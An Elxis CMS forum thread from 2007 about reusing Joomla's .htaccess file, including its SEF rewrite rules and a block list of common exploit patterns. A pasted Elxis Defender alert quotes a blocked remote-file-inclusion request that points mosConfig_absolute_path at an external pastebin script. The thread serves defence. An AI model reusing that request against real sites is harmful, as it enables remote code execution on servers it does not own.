Elxis CMS Forum

Support => General => Topic started by: mhwatson on October 10, 2007, 22:04:09

Title: .htaccess file
Post by: mhwatson on October 10, 2007, 22:04:09

Hi,

I'm currently moving some old Mambo and Joomla sites to a new VPS, and migrating them to Elxis as I go along. I've noticed that the standard .htaccess file in Joomla for instance is far more complex than that in Elxis. Are the extra directives in their file just to cover exploits which can be countered by Elxis Defender, or is it recommended to make any additions to the standard Elxis .htaccess? Any best advice as far as .htaccess files are concerned?

Congratulations on a great CMS, I'm looking forward to seeing '2008'!

Martin.

Title: Re: .htaccess file
Post by: datahell on October 10, 2007, 22:11:50

I believe joomla's htaccess file will be ok for use in Elxis. Some security enhancement is never a bad idea. Can you copy-paste it here? Of course Elxis Defender is a perfect protection for Elxis and easily customizable especially the 2008 version of it!

Here is a real today's attack blocked by Elxis Defender:

Do not reply to this e-mail
This is a notification e-mail from Elxis Defender

Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 85.25.30.127 (blocked)
Requested URI: /?mosConfig_absolute_path=http://pastebin.ca/raw/725499?
DATE: 10-10-2007 20:08:01
Attack was logged

Note: Elxis Defender wont send you another notification for the next 5 minutes even if more attacks occured.

---------------------------------------------------
ELXIS DEFENDER by ELXIS Team
---------------------------------------------------

Title: Re: .htaccess file
Post by: mhwatson on October 10, 2007, 22:19:09

Hi,

Here you go...

>>>>>>>>>>>>>
##
# @version $Id: htaccess.txt 5973 2006-12-11 01:26:33Z robs $
# @package Joomla
# @copyright Copyright (C) 2005 Open Source Matters. All rights reserved.
# @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
# Joomla! is Free Software
##


#####################################################
#  READ THIS COMPLETELY IF YOU CHOOSE TO USE THIS FILE
#
# The line just below this section: 'Options +FollowSymLinks' may cause problems
# with some server configurations.  It is required for use of mod_rewrite, but may already
# be set by your server administrator in a way that dissallows changing it in
# your .htaccess file.  If using it causes your server to error out, comment it out (add # to
# beginning of line), reload your site in your browser and test your sef url's.  If they work,
# it has been set by your server administrator and you do not need it set here.
#
# Only use one of the two SEF sections that follow.  Lines that can be uncommented
# (and thus used) have only one #.  Lines with two #'s should not be uncommented
# In the section that you don't use, all lines should start with #
#
# For Standard SEF, use the standard SEF section.  You can comment out
# all of the RewriteCond lines and reduce your server's load if you
# don't have directories in your root named 'component' or 'content'
#
# If you are using a 3rd Party SEF or the Core SEF solution
# uncomment all of the lines in the '3rd Party or Core SEF' section
#
#####################################################

#####  SOLVING PROBLEMS WITH COMPONENT URL's that don't work #####
# SPECIAL NOTE FOR SMF USERS WHEN SMF IS INTEGRATED AND BRIDGED
# OR ANY SITUATION WHERE A COMPONENT's URL's AREN't WORKING
#
# In both the 'Standard SEF', and '3rd Party or Core SEF' sections the line:
# RewriteCond %{REQUEST_URI} ^(/component/option,com) [NC,OR] ##optional - see notes##
# May need to be uncommented.  If you are running your Joomla!/Mambo from
# a subdirectory the name of the subdirectory will need to be inserted into this
# line.  For example, if your Joomla!/Mambo is in a subdirectory called '/test/',
# change this:
# RewriteCond %{REQUEST_URI} ^(/component/option,com) [NC,OR] ##optional - see notes##
# to this:
# RewriteCond %{REQUEST_URI} ^(/test/component/option,com) [NC,OR] ##optional - see notes##
#
#####################################################


##  Can be commented out if causes errors, see notes above.
Options +FollowSymLinks

#
#  mod_rewrite in use

RewriteEngine On


#  Uncomment following line if your webserver's URL
#  is not directly related to physical file paths.
#  Update Your Joomla!/MamboDirectory (just / for root)

# RewriteBase /


########## Begin - Joomla! core SEF Section
############# Use this section if using ONLY Joomla! core SEF
## ALL (RewriteCond) lines in this section are only required if you actually
## have directories named 'content' or 'component' on your server
## If you do not have directories with these names, comment them out.
#
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
#RewriteCond %{REQUEST_URI} ^(/component/option,com) [NC,OR]       ##optional - see notes##
RewriteCond %{REQUEST_URI} (/|\.htm|\.php|\.html|/[^.]*)$  [NC]
RewriteRule ^(content/|component/) index.php
#
########## End - Joomla! core SEF Section



########## Begin - 3rd Party SEF Section
############# Use this section if you are using a 3rd party (Non Joomla! core) SEF extension - e.g. OpenSEF, 404_SEF, 404SEFx, SEF Advance, etc
#
RewriteCond %{REQUEST_URI} ^(/component/option,com) [NC,OR]       ##optional - see notes##
RewriteCond %{REQUEST_URI} (/|\.htm|\.php|\.html|/[^.]*)$  [NC]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule (.*) index.php
#
########## End - 3rd Party SEF Section



########## Begin - Rewrite rules to block out some common exploits
## If you experience problems on your site block out the operations listed below
## This attempts to block the most common type of exploit `attempts` to Joomla!
#
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
#
########## End - Rewrite rules to block out some common exploits

>>>>>>>>>>>>>

Thanks for the prompt reply!

Martin.

Title: Re: .htaccess file
Post by: datahell on October 10, 2007, 22:36:40

It is OK for usage in Elxis. Just dont use (comment/delete) the part for the third party SEF components.

Title: Re: .htaccess file
Post by: mhwatson on October 10, 2007, 22:46:30

Thanks for your advice - enjoy the rest of your evening!  ;D

Martin.

Title: Re: .htaccess file
Post by: Farhad Sakhaei on October 11, 2007, 11:04:02

john , there is a sample value on .htaccess that refer to mambo name , please rename it for next release .. thanx
# RewriteBase /YourMamboDirectory

Title: Re: .htaccess file
Post by: datahell on October 11, 2007, 11:20:54

Quote from: Farhad Sakhaei on October 11, 2007, 11:04:02

john , there is a sample value on .htaccess that refer to mambo name , please rename it for next release .. thanx
# RewriteBase /YourMamboDirectory

Done!